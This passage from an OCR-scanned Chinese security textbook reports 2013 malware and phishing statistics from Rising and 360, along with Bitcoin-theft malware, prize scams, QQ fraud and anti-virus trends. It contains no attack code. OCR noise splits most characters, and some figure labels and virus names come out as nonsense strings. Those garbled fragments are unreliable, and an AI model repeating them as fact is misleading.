2013 年 1 至 6 月 , 病毒 总 体 数量 比 去 年 下 半年 增长 93.01%, 呈现 出 一 个 爆发 式 的 增长 
态势 。 瑞 星 “ 云 安全 ”系统 截获 挂 马 网 站 246 万 个 (以 网 页 个 数 统计 )， 与 2012 年 下 半年 相 
比 下 降 了 12%。 同 时, 在 报告 期 内 ， 瑞 星 “ 云 安全 ”系统 共 截获 钓鱼 网 站 399 万 个 , 比 2012 
年 下 半年 增长 了 41%， 帮 助 用 户 拦截 钓鱼 网 站 攻击 11 971 万 人 次 。 由 此 可 见 ， 现 阶段 挂 马 
网 站 的 威胁 已 经 远 远 低 于 钓鱼 网 站 攻击 所 带 来 的 威胁 。 

2013 年 上 半年 ， 比 特 币 、 电 视 选秀 节目 、 留 学 生 QQ 和 Cookie 成 为 黑客 及 网 络 诈骗 者 
重点 关注 的 对 象 。 黑 客 制作 病毒 盗 取 比 特 币 ， 并 控制 用 户 电脑 组 成 僵尸 网 络 。 同 时 ， 电 视 
选秀 节目 类 钓鱼 网 站 开始 在 互联 网 上 疯狂 传播 ， 为 用 户 的 网 络 生活 带 来 巨大 风险 。 除 此 之 
外 ， 针 对 留学 生 的 QQ 盗号 和 高 额 诈骗 在 上 半年 频频 发 生 ，Cookie 也 成 为 不 法 分 子 盗 取 用 
户 隐私 的 重要 途径 。 

在 移动 互联 网 方面 ， 智 能 手机 APP 暴露 出 众多 安全 隐患 。 因 APP 应 用 设置 不 当 造 成 
用 户 人 身 安全 的 事故 时 有 发 生 ， 同 时 ， 一 些 不 法 分 子 已 经 开始 利用 微 博 、 微 信 等 互联 网 社 
交 平台 的 定位 功能 ， 定 向 追踪 用 户 的 隐私 信息 ， 为 企业 及 个 人 造成 巨大 安全 威胁 。 另 外 
2013 年 上 半年 ， 多 款 国内 外 知名 无 线路 由 器 也 被 发 现存 在 安全 漏洞 ， 黑 客 可 以 通过 该 类 漏 
洞 对 企业 及 个 人 用 户 进行 终身 监控 。 

美国 “棱镜 ”项 目的 曝光 , 致使 国家 级 信息 战 全 面 爆 发 , 我 国 由 于 过 度 依赖 外 国产 品 
国内 企 事业 机 关 单 位 的 办 公 网 络 目 前 都 处 于 高 危 状态 ， 时 刻 面临 被 第 三 方 监控 的 危险 。 同 
时 ， 各 大 政 企 内 部 的 信息 安全 建设 严重 缺失 ， 建 立 健全 的 信息 安全 体系 是 当务之急 。 除 此 
之 外 ， 虚 拟 化 、 云 应 用 、BYOD 设备 、 智 能 手机 及 可 穿戴 设备 ， 也 严重 威胁 着 企业 机 密 乃 
至 国家 机 要 的 安全 。 


1.3.2 ”电脑 病毒 疫情 统计 


1. 瑞星 公司 2013 年 上 半年 病毒 概述 

1) 病毒 疫情 总 体 概述 

2013 年 1 至 6 月， 瑞星 “ 云 安全 ”系统 共 截 获 新 增 病毒 样本 1 633 万 余 个 。 其 中 木马 
病毒 1 172 万 个 ， 占 总 体 病毒 的 71.8%， 与 2012 年 情况 相同 ， 仍 为 第 一 大 种 类 病毒 。 新 增 
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病毒 样本 包括 蠕虫 病毒 (Worm)198 万 个 ， 占 总 体 数量 的 12.16%， 成 为 第 二 大 种 类 病毒 。 感 
染 型 (Win32) 病 毒 97 万 个 ， 占 总 体 数量 的 5.99%; 后 门 病毒 (Backdoor)66 万 个 ， 占 总 体 数量 
的 4.05%， 位 列 第 三 和 第 四 。 恶 意 广 告 (Adware)、 黑 客 程序 (Hack)、 病 毒 释放 器 (Dropper)、 
恶意 驱动 Rootkib 依 次 排列 ， 比 例 分 别 为 1.91%、1.03%、0.62% 和 0.35%， 如 图 1-1 所 示 。 


来 源 : 瑞星 公司 


1-1 2013 年 上 半年 截获 各 类 型 病毒 比例 


2013 年 上 半年 共有 8.77 亿 人 次 网 民 被 病毒 感染 ， 有 1 985 万 台电 脑 遭 到 病毒 攻击 ， 人 
均 病 毒 感染 次 数 为 44.2 次 。 木 马 病 毒 依然 是 主要 流行 病毒 ， 同 时 蠕虫 病毒 也 有 大 幅 增 长 。 

2) 病毒 感染 地 域 分 析 

病毒 感染 地 域 分 析 如 图 1-2 所 示 。 
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1-2 2013 年 上 半年 各 省 市 病毒 感染 比例 
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2. 瑞星 公司 2013 年 上 半年 病毒 趋势 分 析 


1) 2013 年 上 半年 新 病毒 总 量 剧 增 

2013 年 上 半年 ， 瑞 星 “ 云 安全 ”系统 共 截 获 新 增 病 毒 样本 1 633 万 余 个 ， 呈 现 出 一 个 
爆发 式 的 增长 态势 。 盗 号 和 隐私 信息 贩 售 已 形成 两 大 成 熟 的 黑色 产业 链 ， 呈 现 出 以 木马 、 
感染 型 病毒 为 主 的 明显 特征 。 留 学 生 QQ、 网 游 账 号 密码 、 个 人 隐私 及 企业 机 密 都 已 成 为 
黑客 牟取 暴利 的 主要 渠道 。 

2)“ 和 得 牛 ”““ 猫 癣 ”等 病毒 仍旧 肆虐 

“ 畦 牛 ”、“ 猫 癣 ”病毒 在 2009 年 曾 一 度 肆 虐 互联 网 ， 随 着 各 大 杀毒 厂商 的 绞 杀 而 暂 
时 得 到 有 效 的 控制 ， 但 时 至 今日 ， 采 用 “和 畦 牛 ”、“ 猫 癣 ”病毒 中 dll 支持 技术 传播 的 病毒 
越发 流行 , 各 种 后 门 、 木 马 都 采用 此 种 方法 运行 传播 , 劫持 系统 的 dl 文件 种 类 也 越 来 越 多 。 
同时 ， 由 于 该 类 病毒 会 向 整个 系统 中 所 有 可 执行 文件 目录 和 压缩 包 拷贝 自身 ， 因 此 不 能 用 
快速 查 杀 的 方法 根除 该 病毒 ， 必 须 进行 全 盘查 杀 才 能 将 其 彻底 清除 。 


1.3.3 近期 计算 机 病毒 的 特点 


1. 病毒 制造 趋 于 “机 械 化 ” 

“病毒 制造 机 ”是 网 上 流行 的 一 种 制造 病毒 的 工具 ， 一 个 人 不 需要 任何 专业 技术 就 可 
以 手工 制造 生成 病毒 。 黑 客 可 以 根据 自己 对 病毒 的 需求 ， 很 简单 地 在 相应 的 制作 工具 中 定 
制 病毒 功能 。 病 毒 傻瓜 式 的 制作 导致 病毒 进入 “机 械 化 ”时 代 。 

病毒 的 机 械 化 生产 导致 病毒 数量 的 爆炸 式 增长 。 反 病毒 厂商 传统 的 人 工 收集 以 及 鉴定 
方法 已 经 无 法 应 对 迅猛 增长 的 病毒 。 

2. 病毒 制造 具有 明显 的 模块 化 、 专 业 化 特征 


黑客 组 织 按 功 能 模块 发 外 包 生 产 或 采购 技术 先进 的 病毒 功能 模块 ， 使 得 病毒 的 各 方面 
功能 都 越 来 越 “ 专 业 ”， 病 毒 技术 得 以 持续 提高 和 发 展 ， 对 网 民 的 危害 越 来 越 大 ， 而 解决 
问题 也 越 来 越 难 。 例 如 2008 年 年 底 出 现 的 “超级 AV 终结 者 ” 集 病毒 技术 之 大 成 ， 是 模块 
化 生产 的 典型 代表 。 

在 专业 化 方面 ， 目 前 的 病毒 产业 链条 由 四 个 部 分 组 成 : 挖掘 安全 漏洞 、 制 造 网 页 木马 、 
制造 盗号 木马 、 制 造 木马 下 载 器 (病毒 下 载 者 )。 这 些 环节 形成 了 分 工 明 确 、 效 率 快捷 的 工 
业 化 “生产 线 ”， 每 个 环节 各 司 其 职 ， 专 业 化 趋势 明显 。 

3. 病毒 制造 集团 化 


金山 网 络 在 《2010 一 2011 年 中 国 互联 网 安全 研究 报告 》 中 指出 ， 通 过 金山 网 络 “ 云 安 
全 ”系统 对 病毒 传播 渠道 的 长 期 跟踪 、 对 病毒 下 载 链 接 的 自动 监控 发 现 ， 计 算 机 病毒 产业 
的 收益 已 过 百 亿 元 , 数 十 家 病毒 集团 借 此 获得 了 巨额 非法 收益 , 如 黄 飞 虎 集团 、HYC 集团 、 
HY 集团 、 老 蛇 集 团 、192 集团 、GZWZ 集团 、CL 集团 、 张 峰 集团 、WG 集团 、 安 妮 集 团 ， 
这 十 大 病毒 集团 控制 了 互联 网 上 80% 的 病毒 下 载 通道 。 与 普通 的 病毒 制造 者 不 同 ， 病 毒 集 
团 有 足够 的 财力 、 人 力 持 续 进行 病毒 的 更 新 和 传播 ， 和 杀毒 厂商 玩 着 “ 猫 捉 老鼠 ”的 游戏 。 


也 
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1.3.4 ”木马 病毒 疫情 的 分 布 


高 校 是 年 轻 人 聚集 的 地 区 ， 互 联网 安全 环境 有 一 定 的 特殊 性 。360 安全 中 心 在 2013 年 
第 二 季度 针对 全 国 60 余 所 高 等 院 校 的 上 网 风险 人 群 比例 和 上 网 高 危 人 群 比例 进行 了 分 析 。 
统计 显示 ， 国 内 高 校 上 网 风险 人 群 平均 比例 为 30.4%， 高 于 全 国 27.8% 的 平均 值 ， 但 高 危 
人 和 群 平均 比例 为 1.16%， 明 显 低 于 1.45% 的 全 国平 均 水 平 。 

在 本 次 统计 的 60 余 所 高 等 院 校 中 ， 上 网 风险 人 群 比例 最 高 的 10 所 高 校 分 别 是: 首都 
师范 大 学 (49.49%0)、 暨 南大 学 (44.7%)、 华 南 农业 大 学 (44.2%0)、 黑 龙 江 大 学 (44.2%6)、 北 京 科 
技 大 学 (43.4%)、 西 华 大 学 (43.1%)、 重 庆 工 学 院 (43.0%)、 郑 州 大 学 (42.6%)、 北 方 工业 大 学 
(41.4%)、 北 京 联 合 大 学 (40.3%)。 其 中 ， 暨 南大 学 、 华 南 农业 大 学 、 黑 龙 江 大 学 、 重 庆 工学 
院 、 北 方 工业 大 学 在 2013 年 第 一 季度 的 统计 中 ,也 属于 高 危 人 群 比 例 最 高 的 10 所 院 校 
之 一 : 

上 网 风险 人 和 群 比例 最 低 的 10 所 高 校 分 别 是 : 宁波 大 学 (22.3%)、 北 京 大 学 (21.9%)、 同 
济 大 学 (21.3%)、 中 国人 民 大 学 (20.9%)、 清 华 大 学 (20.3%)、 上 海 师 范 大 学 (18.9%)、 台 湾 大 
学 (18.0%)、 北 京 工 业 大 学 (16.5%)、 湖 南 农业 大 学 (16.3%)、 中 央 财 经 大 学 (14.3%)。 其 中 ， 
台湾 大 学 、 北 京 工业 大 学 、 湖 南 农业 大 学 和 中 央 财 经 大 学 都 是 首次 进入 风险 人 群 比例 最 低 
的 10 所 高 校 名单 。 

上 网 高 危 人 群 比例 最 高 的 10 所 院 校 分 别 是 :华南 农业 大 学 (4.55%)、 湖 北 第 二 师范 学 
院 (2.52%)、 四 川 师范 大 学 (2.45%)、 集 美 大 学 (1.99%)、 重庆 工学 院 (1.70%)、 四 川 大 学 (1.47%)、 
华东 理工 大 学 (1.41%)、 成 都 工业 学 院 (1.38%)、 西 华 大 学 (1.36%)、 湖 南 师范 大 学 (1.31%)。 
其 中 ， 华 南 农业 大 学 、 重 庆 工 学 院 、 华 东 理 工大 学 等 高 校 在 2013 年 第 一 季度 的 统计 中 ， 也 
属于 高 危 人 群 比例 最 高 的 10 所 院 校 之 一 。 另 外 ， 华 南 农业 大 学 、 重 庆 工学 院 、 西 华 大 学 等 
学 校 同 时 也 分 别 是 上 网 风险 人 群 比例 最 高 的 10 所 院 校 之 一 。 

上 网 高 危 人 群 比例 最 低 的 10 所 院 校 分 别 是 : 中 央 财 经 大 学 (0.12%)、 北 京 大 学 (0.51%)、 
中 国人 民 大 学 (0.51%)、 首 都 师范 大 学 (0.52%)、 上 海 师范 大 学 (0.52%)、 湖 南 农业 大 学 (0.56%)、 
东 华 大 学 (0.58%)、 清 华 大 学 (0.60%)、 东 南大 学 (0.64%)、 北 京 科 技 大 学 (0.72%)。 其 中 ， 中 
央 财 经 大 学 、 清 华 大 学 、 北 京 大 学 、 中 国人 民 大 学 、 湖 南 农 业 大 学 、 上 海 师范 大 学 也 分 别 
属于 上 网 风险 人 群 比例 最 低 的 院 校 之 一 。 另外， 北京 大 学 、 中 国人 民 大 学 也 是 2013 年 第 一 
季度 上 网 高 危 人 群 比例 最 低 的 10 所 院 校 之 一 。 


1.3.5 ”恶意 网 站 


1. 挂 马 网 站 


2013 年 第 二 季度 ，360 互联 网 安全 中 心 共 截获 新 增 挂 马 网 站 3 835 个 ， 较 2012 年 同期 
的 104 万 个 同比 减少 了 99.6%， 较 2013 年 第 一 季度 的 1.17 万 个 环比 下 降 了 67.2%, 平均 每 
天 截获 新 增 挂 马 网 站 42.1 个 ， 具 体 情况 如 图 1-3 所 示 。 


NNO 弟 1 音 网 绛 安全 租 冰 


2012,2013 年 第 二 季度 新 增 挂 马 网 站 数 对 比 


=2012 (十 万 ) =2013 ( 千 ) 


1-3 同期 新 增 挂 马 网 站 数 对 比 


2013 年 第 二 季度 ，360 互联 网 安全 中 心 共 拦 截 挂 马 网 页 访问 量 173.7 万 次 ， 较 2012 年 
同期 的 864 万 次 同比 减少 了 79.9%， 较 2013 年 第 一 季度 的 190.6 万 次 环比 下 降 了 8.87%， 
平均 每 天 拦截 挂 马 网 页 访问 量 1.91 万 次 ， 具 体 情况 如 图 1-4 所 示 。 


2012,2013 年 第 二 季度 挂 马 网 站 云 查询 拦截 量 对 比 


图 1-4 同期 挂 马 网 站 云 查 询 拦截 量 对 比 
上 述 数 据 表明 ， 无 论 是 挂 马 网 站 的 新 增 数量 还 是 挂 马 网 页 拦截 量 ， 在 安全 软件 与 安全 
浏览 器 的 双重 打击 下 ， 都 在 呈现 快速 下 降 的 趋势 ， 尤其 是 2013 年 以 来 ， 挂 马 网 站 已 经 几 近 
灭绝 ， 具 体 情况 如 图 1-5 所 示 。 
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2010 年 1 月 -2013 年 6 月 每 月 新 增 挂 马 网 站 数 (万 ) 


图 1-5 近 三 年 每 月 新 增 挂 马 网 站 数 统计 

与 挂 马 网 页 的 衰落 形成 鲜明 对 比 的 是 ， 近 7 年 来 钓鱼 网 站 数量 的 持续 快速 增长 。 钓 鱼 
网 站 已 经 超过 木马 病毒 ， 成 为 中 国 网 民 上 网 安全 的 最 大 威胁 。 

现在 通过 传统 的 检测 手段 很 难 发 现 和 拦截 钓鱼 网 站 ， 这 是 因为 钓鱼 网 站 属于 恶意 信息 
而 非 恶 意 代 码 。 而 且 ，70% 以 上 钓鱼 网 站 的 服务 器 设 在 境外 ， 使 得 我 们 通过 法 律 手段 来 监 
管 和 打击 钓鱼 网 站 十 分 困难 。 所 以 ， 只 能 采用 网 址 云 安全 技术 、 在 线 风 险 鉴 定 技术 等 新 型 
互联 网 安全 技术 ， 这 些 技术 也 因此 成 为 近年 来 安全 软件 发 展 和 应 用 的 新 方向 。 同 时 ， 安 全 
软件 与 钓鱼 网 站 的 斗争 也 已 经 进入 竞 速 时 代 。 

2. 钓鱼 网 站 

1) 钓鱼 网 站 呈 翻 倍增 长 趋势 

2013 年 第 二 季度 ，360 互联 网 安全 中 心 共 截获 新 增 钓鱼 网 站 51.4 万 个 ， 较 2012 年 同 
期 的 18.3 万 个 同比 增长 了 180.9%， 较 2013 年 第 一 季度 的 78.7 万 个 环比 下 降 了 34.7%， 平 
均 每 天 截获 新 增 钓鱼 网 站 约 5648 个 ， 具 体 情况 如 图 1-6 所 示 。 


2012,2013 年 第 二 季度 新 增 钓鱼 网 站 数 对 比 


潼 洲 藻 振 半 ”车 淡 式 褒 上 tt 到 沼 卫 


1-6 同期 新 增 钓鱼 网 站 数 对 比 


2) 新 增 钓鱼 网 站 类 型 分 布 
从 新 增 钓鱼 网 站 的 类 型 分 布 上 看 ， 虚 假 购 物 、 模 仿 登录 和 虚假 中 奖 仍然 位 居 前 三 位 ， 
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但 模仿 登录 类 钓鱼 网 站 的 新 增 数量 超过 了 虚假 中 奖 ， 位 列 第 二 。 虚 假 购物 仍然 是 新 增 数量 
最 多 的 钓鱼 网 站 。 此 外 ， 境 外 彩票 增长 迅速 ， 超 过 假 医 假 药 位 列 第 四 ， 具 体 情况 如 图 1-7 
所 示 。 


2013 年 第 二 季度 新 增 钓鱼 网 站 类 型 分 布 


1-7 2013 年 第 二 季度 新 增 钓 鱼网 站 类 型 分 布 


3) 钓鱼 网 站 服务 器 地 域 分 布 

从 钓鱼 网 站 服务 器 的 地 域 分 布 上 看 ，77.1% 的 钓鱼 网 站 分 布 在 境外 地 区 。 其 中 , 美国 仍 
然 以 38.0% 的 比例 成 为 中 国 钓鱼 网 站 危害 的 最 大 源头 ， 平 均 每 天 新 增 的 钓鱼 网 站 2146 个 。 
而 来 自 北美 其 他 地 区 的 新 增 钓 鱼网 站 数量 在 二 季度 快速 增长 ， 占 比 高 达 30.3%， 平 均 每 天 
新 增 1 711 个 。 韩国 是 一 季度 仅 次 于 美国 的 第 二 大 钓鱼 网 站 源头 ， 占 比 一 度 高 达 19.0%, 但 
在 二 季度 ,包括 韩 国 在 内 的 整个 亚太 地 区 ， 新 增 钓 鱼网 站 数量 也 仅 占 总 量 的 3.3%。 而 来 自 
欧洲 的 新 增 钓鱼 网 站 数量 小 幅 增 长 了 0.9 个 百分点 ， 为 3.9%。 这 些 数 据 从 另 一 方面 也 反映 
出 ， 钓 鱼网 站 的 作者 正在 通过 不 断 、 快 速 地 变换 钓鱼 网 址 的 方式 来 与 网 址 云 安 全 系统 进行 
对 抗 。 反 钓鱼 工作 变 得 越 来 越 困 难 ， 正 反 力 量 在 速度 上 的 比拼 进一步 升级 。 同 时 也 是 对 反 
病毒 厂商 针对 病毒 的 分 析 和 处 理 能 力 的 严峻 考验 ， 有 具体 情况 如 图 1-8 所 示 。 


中 国内 地 


北美 其 他 地 区 


图 1-8 2013 年 第 二 季度 新 增 钓 鱼网 站 地 域 分 布 
从 国内 情况 看 ， 来 自 香 港 地 区 的 新 增 钓 鱼网 站 数量 占 比 由 一 季度 的 10.8% 下 降 到 
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7.2%， 平 均 每 天 新 增 407 个 ;而 来 自 中 国内 地 的 新 增 钓鱼 网 站 数量 则 呈 大 幅 增 长 态势 ， 占 
比 由 一 季度 的 9.3% 一 跃 上 升 至 15.7%， 平 均 每 天 新 增 887 个 。 内 地 的 新 增 钓鱼 网 站 主要 来 
自 广 东 、 吉 林 、 北 京 、 江 苏 和 浙江 这 五 个 省 区 ， 分 别 占 到 内 地 新 增 钓鱼 网 站 总 量 的 22.3%、 
12.1%、9.4%、9.0% 和 8.7%。 

总 体 来 看 ， 在 新 增 钓鱼 网 站 总 量 有 所 下 降 的 情况 下 ， 来 自 中 国内 地 的 钓鱼 网 站 数量 反 
而 有 所 增加 ， 这 一 点 值得 警惕 。 不 过 ， 绝 大 多 数 钓鱼 网 站 来 自 境外 地 区 的 基本 现状 没有 
改变 。 

针对 中 国内 地 用 户 的 钓鱼 网 站 之 所 以 会 在 境外 地 区 泛滥 ， 主 要 原因 是 这 些 地 区 对 网 站 
注册 的 审核 机 制 比较 宽松 ， 而 且 钓 鱼网 站 的 受害 者 及 相关 法 律 诉讼 也 大 多 不 在 当地 ， 客 观 
上 为 不 法 分 子 逃 避 法 律 监管 提供 了 便利 ， 而 且 这 种 情况 短期 内 难以 改变 。 

3. 个 人 隐私 信息 安全 


1) 比特 币 

2013 年 上 半年 ， 一 种 名 为 比特 币 的 新 型 虚拟 货币 在 网 上 异常 火爆 ， 其 兑换 峰值 曾 高 达 
1 比特 币 兑换 266 美元 ， 由 此 引发 病毒 风暴 。 然 而 据 业 内 人 士 透 露 ，2013 年 3 月 ， 一 家 比 
特 币 中 介 公 司 遭 到 黑客 兢 击 ， 被 盗 走 价值 12 480 美元 的 比特 币 ， 约 合 7.7 万 元 人 民 币 。 由 
于 比特 币 的 特殊 性 ， 被 盗 后 基本 无 法 找 回 ， 所 有 损失 只 能 由 该 中 介 自 行 承担 。 

比特 币 是 一 种 利用 开源 P2P 软件 “挖掘 ”的 网 络 虚拟 货币 ， 通 过 特定 算法 的 大 量 计 算 
产生 ， 由 于 总 数量 有 限 而 使 其 价值 急速 攀升 。 瑞 星 安全 专家 介绍 ， 比 特 币 具有 的 高 匿名 性 ， 
一 旦 被 盗 将 很 难 追查 , 也 因此 备 受 黑 客 关 注 。 据 瑞星 “ 云 安全 ”系统 监测 , 仅 2013 上 半年 ， 
瑞星 就 截获 到 2 204 个 与 比特 币 相 关 的 病毒 样本 ， 而 根据 瑞星 反 病毒 实验 室 出 具 的 报告 显 
示 ， 一 种 名 为 “Kelihos” 的 比特 币 病毒 ， 会 自动 查找 用 户 计 算 机 上 所 有 关于 比特 币 钱包 的 
信息 ， 从 而 盗 取 比特 币 ， 用 户 一 旦 感染 这 些 病 毒 ， 账 号 中 的 比特 币 将 直接 被 盗 ， 甚 至 还 会 
为 黑客 “ 挖 矿 ”( 是 指 利用 僵尸 网 络 的 被 感染 节点 主机 进行 挖掘 虚拟 货币 的 行为 )， 帮 助 其 
赚钱 。 黑 客 盗 取 比 特 币 的 流程 如 图 1-9 所 示 。 


枣 童 程序 在 肉鸡 环境 中 运行 


释放 比特 币 采矿 程序 到 总 代码 进行 传 才 
进行 比 恩 币 采 矿 \ 
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2) 针对 电视 选秀 节目 的 场 外 抽奖 诈骗 

据 瑞星 安全 专家 介绍 , 假冒 热门 综艺 类 电视 节目 中 奖 类 钓鱼 网 站 , 会 通过 短信 、 彩 信 、 
邮件 、QQ， 甚 至 是 传真 等 多 种 渠道 散播 虚假 中 奖 信息 ， 以 高 额 奖 金 及 高 端 电 脑 等 丰厚 奖品 
作为 诱饵 ， 将 网 友 引 向 制作 精良 、 难 辩 真 伪 的 高 仿 钓 鱼网 站 进行 钓鱼 诈骗 。 在 “ 领 奖 过 程 
中 ， 骗 子 利 用 假冒 的 领 奖 信息 页 面 套 取 网 友 的 姓名 、 电 话 、 住 址 、 银 行 卡号 和 身份 证 等 重 
要 个 人 信息 ， 以 便 牟 取 暴 利 。 同 时 ， 骗 子 还 会 以 奖金 奖品 的 转账 及 运输 风险 抵押 金 为 名 ， 
让 用 户 汇 款 到 指定 账户 ， 达 到 骗取 钱财 的 目的 。 

3) 留学 生 QQ 频 遭 盗号 和 高 额 诈骗 

近 几 年 ， 频 繁 发 生 的 “海外 留学 生 QQ 号 被 盗 ” 事 件 ， 引 起 了 社会 的 高 度 关 注 。 据 瑞 
星 安全 专家 介绍 ， 骗 子 通过 不 法 手段 获取 留学 生 的 QQ 号 ， 并 假冒 其 本 人 ， 来 骗取 家 长 的 
信任 ， 从 而 达到 诈骗 钱财 的 目的 。 

针对 海外 留学 生 对 租房 、 二 手 车 交易 和 网 络 社交 类 信息 较为 关注 的 特点 ， 黑 客 首先 在 
此 类 网 站 或 论坛 中 植 入 木马 病毒 ， 再 混 进 留 学 生 的 QQ 和 群 进行 散播 ， 安 全 意识 不 强 的 留学 
生 的 计算 机 会 因此 中 毒 。 而 后 ， 骗 子 会 通过 各 种 方式 引诱 被 盗号 者 视频 聊天 并 录像 ， 再 对 
聊天 记录 进行 语言 习惯 分 析 ， 利 用 视频 假冒 被 盗 者 ， 以 各 种 理由 诱骗 家 长 向 其 指定 账号 进 
行 汇款 ， 骗 取 金 额 至 少 上 万 元 ， 多 则 可 至 几 十 万 元 。 目 前 ， 留 学 生 已 经 成 为 QQ 诈骗 的 主 
要 目标 群体 ， 不 少 家 庭 已 因此 遭受 到 极 大 的 精神 和 经 济 损 失 。 利 用 留学 生 QQ 进行 诈骗 的 
流程 如 图 1-10 所 示 。 


黑客 首先 混入 目标 QQ 群 


在 QQ 群 中 发 布 各 类 信息 
豚 引 月 标 人 群 点 击 木马 网 站 , 


生生 生生 合肥 
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咨 取 QQ 密码 及 用 户 视频 画面 . 


根据 盗 取 的 用 户 资料 ， 利 用 时 间 差 ， 


找 其 闲人 纺 洁 各 种 再 自 久 全， 


来 源 ; 瑞星 公司 


1-10 ”留学 生 亲 友 遭 QQ 诈骗 流程 
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Cookie 作为 服务 器 暂时 存放 在 用 户 计算 机 里 的 一 个 文本 文件 ， 其 作用 是 让 网 站 快速 识 
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别 用 户 的 访问 信息 及 行为 。 但 当 2013 年 的 3。15 晚会 曝光 了 Cookie 可 能 威胁 用 户 隐私 
事件 后 , Cookie 这 一 互联 网 行业 专业 词汇 迅速 为 广大 民众 所 熟知 , 并 成 为 人 们 关注 的 焦点 。 
目前 , 不 少 互 联网 企业 都 通过 Cookie 能 够 记录 上 网 行为 的 特性 ， 用 其 跟踪 并 分 析 用 户 

的 网 络 习 惯 和 喜好 ， 以 便 定向 投放 产品 广告 信息 ， 来 达到 推销 自身 的 目的 。 虽 然 定 向 投放 
告 可 以 满足 用 户 的 需求 ， 但 也 暴露 了 用 户 在 浏览 网 页 时 的 操作 行为 及 隐私 信息 。 同 时 ， 

一 些 网 站 在 获取 用 户 的 Cookie 信息 后 ， 会 将 这 些 信息 作为 “筹码 ”， 用 于 商业 交易 ， 以 谋 
取 私利 。 更 有 一 些 网 站 ， 利 用 Cookie 信息 推送 虚假 产品 、 违 法 商品 信息 ， 进 行 钓鱼 诈骗 。 

5) 微 博 取代 传统 渠道 ， 成 为 钓鱼 诈骗 的 重要 手段 

现今 ， 利 用 微 博 平台 进行 广告 推销 已 很 平常 ， 但 由 于 微 博 平台 对 于 广告 信息 的 发 布 缺 
乏 严 格 的 监管 ， 从 而 使 很 多 欺诈 性 广告 频繁 出 现 ， 让 网 友 在 不 知 不 觉 中 上 当 受 骗 。 

据 瑞星 安全 专家 介绍 ， 骗 子 通过 赠送 礼品 与 直接 花 钱 等 方式 收买 微 博大 号 ， 利 用 其 发 
布 虚假 广告 信息 ， 且 广告 中 的 商品 价格 极 具 诱惑 性 ， 使 得 不 少 网 友信 以 为 真 。 同 时 ， 有 的 
骗子 还 利用 国外 交易 平台 作为 商品 展示 ， 以 没有 国外 正规 支付 平台 账号 为 借口 ， 要 求 买 家 
直接 打 款 购买 ， 一 旦 买 家 轻信 并 支付 钱 款 ， 骗 子 便 诈 骗 成 功 。 


1.3.6” 反 病毒 技术 发 展 趋势 


1) 建立 标准 统一 的 “云端 ”服务 器 

云 安 全 需要 一 个 开放 性 的 安全 服务 平台 作为 基础 ， 该 平台 可 为 第 三 方 安全 合作 伙伴 提 
供与 病毒 对 抗 的 支持 。 使 得 缺乏 技术 储备 与 设备 支持 条 件 的 第 三 方 合作 伙伴 ， 也 能 参与 到 
反 病 毒 的 阵线 中 来 ， 摆 脱 目 前 反 病毒 厂商 孤军 奋战 的 局 面 。 政 府 应 组 织 所 有 的 杀毒 厂商 建 
立 一 个 联盟 ， 并 订立 一 个 通用 的 协议 ， 共 建 一 个 “安全 云 ”系统 ， 内 容 包括 统一 的 恶意 代 
码 检测 规则 、 安 全 事件 处 理 、 恶 意 网 站 识别 规则 和 可 疑 文件 搜集 等 。 这 个 “安全 云 ” 系 统 
就 是 一 个 病毒 库 的 提供 商 ， 它 无 疑 会 成 为 世界 上 最 大 的 病毒 库 ， 所 有 的 安全 厂商 都 可 以 通 
过 接口 连接 到 “云端 ”进行 安全 检测 。 这 样 各 安全 厂商 就 可 将 精力 和 资金 用 在 保护 客户 端 
安全 的 研发 上 ， 努 力 使 自身 的 产品 功能 更 完善 。 

2) 多 种 自动 分 析 技 术 与 人 工分 析 结 合 

自动 分 析 识别 判定 的 依据 主要 有 两 个 ， 一 个 是 程序 自身 的 行为 分 析 权 值 分 析 完毕 后 相 
加 ， 判 断 其 是 否 符合 界定 为 一 种 新 出 现 的 恶意 程序 的 标准 ; 另 一 个 则 是 用 海量 客户 端 提交 
的 数目 来 做 判断 。 因 此 ， 为 了 节省 时 间 和 效率 ， 并 提高 智能 分 析 服 务 器 平台 的 机 动 灵活 性 ， 
可 以 将 第 二 种 判别 机 制 上 升 为 最 高 优先 级 。 另 外 ，“ 云 安全 ”服务 端 可 以 采用 多 种 鉴定 方 
法 ， 包 括 虚拟 机 、 启 发 式 分 析 、 沙 盒 技术 、 动 态 行为 分 析 、API 序列 分 析 等 ， 而 且 新 的 分 
析 方法 在 不 断 改进 和 增加 。 多 种 分 析 方 法 并 行 、 相 互 纠 错 ， 这 些 鉴定 方法 对 病毒 作者 来 说 ， 
是 完全 不 可 见 的 ， 他 们 无 法 知道 “ 云 安全 ”服务 器 端 是 用 何 种 手段 在 对 付 病毒 木马 ， 也 就 
无 法 拿 出 针对 性 的 绕 过 或 反 制 手段 。 自 动 分 析 系 统 需 要 病毒 分 析 员 不 断 总 结对 程序 的 判断 
经 验 ， 通 过 这 些 相关 的 恶意 程序 进行 分 析 ， 可 以 不 断 地 更 新 自动 判断 逻辑 ， 以 提高 自动 分 
析 系 统 判断 的 准确 性 ， 以 及 它 识别 恶意 程序 的 能 力 。 并 且 通 过 监控 这 些 恶 意 程序 的 相关 变 
化 , 分 析 人 员 可 以 为 “ 云 安全 ”客户 端 提供 防御 策略 以 及 启发 特征 、 行 为 特征 ， 以 提高 “ 云 
安全 ”客户 端的 防御 能 力 。 

3)“ 云 安全 ”与 传统 防 病毒 结合 

“ 云 网 络 ” 的 健壮 性 和 自我 安全 性 是 厂家 服务 网 络 的 一 部 分 , 这 是 一 个 基础 组 成 部 分 ， 
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是 一 个 前 提 。 每 一 个 厂家 都 应 该 在 构建 “ 云 网 络 ” 时 就 同步 部 署 其 健壮 保护 体系 ， 作 为 服 
务 网 络 ， 这 是 不 可 分 割 的。 当前 还 没有 专门 针对 “ 云 环 境 ” 的 安全 威胁 ， 对 于 云 的 保护 ， 
主要 是 对 于 “云端 ”服务 器 而 言 ， 保 障 这 部 分 安全 主要 依靠 传统 的 网 关 、 防 火 墙 、 容 灾 备 
份 和 为 云 设 置 监控 系统 等 措施 。 

“ 云 安全 ”对 传统 杀毒 模式 的 影响 不 是 一 朝 一 夕 就 能 完成 的 。 虽 然 传统 的 病毒 防范 模 
式 具有 一 定 的 局 限 性 , 但 是 优点 也 很 突出 ,就 是 准确 度 和 处 理 质 量 都 很 高 。 对 于 其 局 限 性 ， 
目前 很 多 安全 厂商 都 已 通过 添加 其 他 的 安全 模块 ， 如 启发 式 分 析 、 主 动 防御 、IDP 系统 
(Intrusion Detection & Prevention System， 入 侵 侦 测 防御 系统 ) 等 进行 了 有 效 的 提升 。 现 
